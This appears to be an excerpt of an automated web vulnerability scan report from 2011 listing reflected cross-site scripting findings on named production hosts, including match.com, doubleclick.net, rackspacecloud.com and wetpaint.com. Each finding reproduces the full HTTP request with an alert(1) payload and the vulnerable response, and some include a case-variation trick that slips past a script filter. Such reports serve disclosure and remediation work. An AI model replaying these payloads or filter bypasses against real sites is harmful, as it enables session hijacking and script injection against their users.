GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank4913e"><script>alert(1)</script>2aae3020d1a&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/ HTTP/1.1 Host: media.match.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:36 GMT Server: Apache/1.3.37 (Unix) Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/ Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:36 GMT; path=/; domain=.match.com Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:36 GMT; path=/; domain=.match.com Content-Type: text/html Content-Length: 4987 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... <A TARGET="_blank4913e"><script>alert(1)</script>2aae3020d1a" HREF="http://media.match.com/click.ng?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&click=http://r.turn.com/r/f ...[SNIP]...
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload e774e<script>alert(1)</script>33aa020c94a was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1296921569996&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-5526064907005908&slotname=Technology_HomePage_237Top2e774e<script>alert(1)</script>33aa020c94a&page_slots=Technology_HomePage_237Top2&cust_params=Pageview%3DHomePage%26Permission%3DReg-regcom%26Flagged%3DNo%26Topic%3DTechnology%26WikiName%3Dhtcwiki%26UserRole%3DAnonymous%26ReturnVisitor%3Dfalse%26IsWPUser%3Dfalse%26AgeGroup%3D%26Gender%3D&cookie_enabled=1&ga_vid=1442931598.1296921570&ga_sid=1296921570&ga_hid=33117073&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&lmt=1296943170&dt=1296921570006&cc=12&biw=985&bih=996&ifi=1&adk=1893771767&channel=1000006000%2C1000001000%2C1000003000%2C1000003001%2C1000006001%2C1000006002%2C1000000118%2C1000001018%2C1000003019%2C1000006019&hints=technology%2C%20electronics%2C%20PC%2C%20laptop%2C%20cell%20phone%2C%20smart%20phone%2C%20PDA%2C%20new%20technology%2C%20technology%20news%2C%20wireless%20technology%2C%20&ad_type=text&u_tz=-360&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 16:02:06 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 1453
GA_googleSetAdContentsBySlotForSync({"Technology_HomePage_237Top2e774e<script>alert(1)</script>33aa020c94a":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
4.97. https://signup.rackspacecloud.com/signup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://signup.rackspacecloud.com
Path:
/signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 833f8"><script>alert(1)</script>2f5afd2fed7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /signup?833f8"><script>alert(1)</script>2f5afd2fed7=1 HTTP/1.1 Host: signup.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Mosso Engineering) Content-Type: text/html; charset=utf-8 Date: Sat, 05 Feb 2011 15:25:22 GMT Keep-Alive: timeout=15, max=139 Connection: close Set-Cookie: symfony=3mbf46jt4ltiml2f8iqrbimlp5; path=/ X-Powered-By: PHP/5.2.6 Content-Length: 17282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cc9a<img%20src%3da%20onerror%3dalert(1)>1b1cc5a4bc5 was submitted in the REST URL parameter 4. This input was echoed as 8cc9a<img src=a onerror=alert(1)>1b1cc5a4bc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /scripts/wpcss/skin/meadowgreen8cc9a<img%20src%3da%20onerror%3dalert(1)>1b1cc5a4bc5/s.css?20110120041852 HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:00:20 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=1EF4A790692B899F9F7BAFD81DBBB10D; Path=/ Cache-Control: max-age=2592000 Expires: Mon, 07 Mar 2011 16:00:20 GMT Vary: Accept-Encoding Content-Type: text/css;charset=UTF-8 Content-Length: 4350
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c807d<img%20src%3da%20onerror%3dalert(1)>89bbccc59db was submitted in the REST URL parameter 3. This input was echoed as c807d<img src=a onerror=alert(1)>89bbccc59db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /scripts/wpjsPage/pagec807d<img%20src%3da%20onerror%3dalert(1)>89bbccc59db/p.js?v=20110120041852 HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=F6E1F8144EB4CA5D1686E51986AC76AA; wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:38 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=0B6E0BAD75294417BE18C8FE72F24144; Path=/ Cache-Control: max-age=2592000 Expires: Mon, 07 Mar 2011 15:59:38 GMT Vary: Accept-Encoding Content-Type: text/javascript;charset=ISO-8859-1 Content-Length: 103
The requested resource (/js/pages/pagec807d<img src=a onerror=alert(1)>89bbccc59db.js) is not available
The value of the memberData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3910</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>b4e740388f2 was submitted in the memberData parameter. This input was echoed as e3910</ScRiPt ><ScRiPt>alert(1)</ScRiPt>b4e740388f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-e3910</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>b4e740388f2&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:48 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=F2E506E6F40E7272E29FB7C4E180C4EC; Path=/ Content-Length: 2310 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:48 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
...[SNIP]... ); //required since an iframe's referrer is not the same as the parent page's globalGaTracker._setDomainName( rootDomain ); globalGaTracker._setCustomVar(1,"MemberData",'N__anonymous__-__-e3910</ScRiPt ><ScRiPt>alert(1)</ScRiPt>b4e740388f2',1); //globalGaTracker._setCustomVar(2,"Contribution",[contributionCounter],1) globalGaTracker._setCustomVar(3,"MultiSiteVisits",1,2); globalGaTracker._setCustomVar(4,"S ...[SNIP]...
The value of the pageType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9b2"%3balert(1)//6628d3ad43d was submitted in the pageType parameter. This input was echoed as 6c9b2";alert(1)//6628d3ad43d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage6c9b2"%3balert(1)//6628d3ad43d&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:51 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=220715F4738F4E6735C191E62267FD6E; Path=/ Content-Length: 2236 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:51 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe633'%3balert(1)//6bf50d8f015 was submitted in the ref parameter. This input was echoed as fe633';alert(1)//6bf50d8f015 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=fe633'%3balert(1)//6bf50d8f015&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:53 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=32604A57F6152A669FC5F4E4513C5645; Path=/ Content-Length: 2264 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:53 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
globalGaTracker._setReferrerOverride('fe633';alert(1)//6bf50d8f015'); //required since an iframe's referrer is not the same as the parent page's globalGaTracker._setDomainName( rootDomain ); globalGaTracker._setCustomVar(1,"MemberData",'N__anonymous__-__ ...[SNIP]...
The value of the segmentProfile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6811c'%3balert(1)//93742b54adf was submitted in the segmentProfile parameter. This input was echoed as 6811c';alert(1)//93742b54adf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-106811c'%3balert(1)//93742b54adf&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:44 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=BD560CBA29D5FF2BCD7C9BBADEAE5064; Path=/ Content-Length: 2235 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:44 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
adChannelGaTracker._setReferrerOverride(''); //required since an iframe's referrer is not the same as the parent page's adChannelGaTracker._setDomainName(rootDomain); adChannel ...[SNIP]...
The value of the siteCat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f59d8'%3balert(1)//f17e3fe8edb was submitted in the siteCat parameter. This input was echoed as f59d8';alert(1)//f17e3fe8edb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technologyf59d8'%3balert(1)//f17e3fe8edb&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:51 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=FE6F1B1277DF20F3DAF73CAFC657E9B3; Path=/ Content-Length: 2269 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:51 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the siteName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 779b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>41504730d2c was submitted in the siteName parameter. This input was echoed as 779b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>41504730d2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki779b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>41504730d2c&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:51 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=DA229296C73FE646FDCCE50BBF755E20; Path=/ Content-Length: 2310 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:51 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the sitesCount request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3b06f%3balert(1)//2503310a12c was submitted in the sitesCount parameter. This input was echoed as 3b06f;alert(1)//2503310a12c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=13b06f%3balert(1)//2503310a12c&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:52 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=E1FCA5C2375BFF42E571DC325636DE6B; Path=/ Content-Length: 2261 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:52 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
...[SNIP]... setCustomVar(1,"MemberData",'N__anonymous__-__-',1); //globalGaTracker._setCustomVar(2,"Contribution",[contributionCounter],1) globalGaTracker._setCustomVar(3,"MultiSiteVisits",13b06f;alert(1)//2503310a12c,2); globalGaTracker._setCustomVar(4,"SiteName",'htcwiki',3); globalGaTracker._setCustomVar(5,"Category",'Technology',3); globalGaTracker._trackPageview("/homePage"); } ca ...[SNIP]...
The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload 1ace3</title><script>alert(1)</script>ae207730a4d was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki1ace3</title><script>alert(1)</script>ae207730a4d&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:53 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=CE120C471FB90B16FE35CF6CDEA6164D; Path=/ Content-Length: 2257 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:53 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki1ace3</title><script>alert(1)</script>ae207730a4d</title> ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 267a4"%3balert(1)//ec0110e87b was submitted in the url parameter. This input was echoed as 267a4";alert(1)//ec0110e87b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
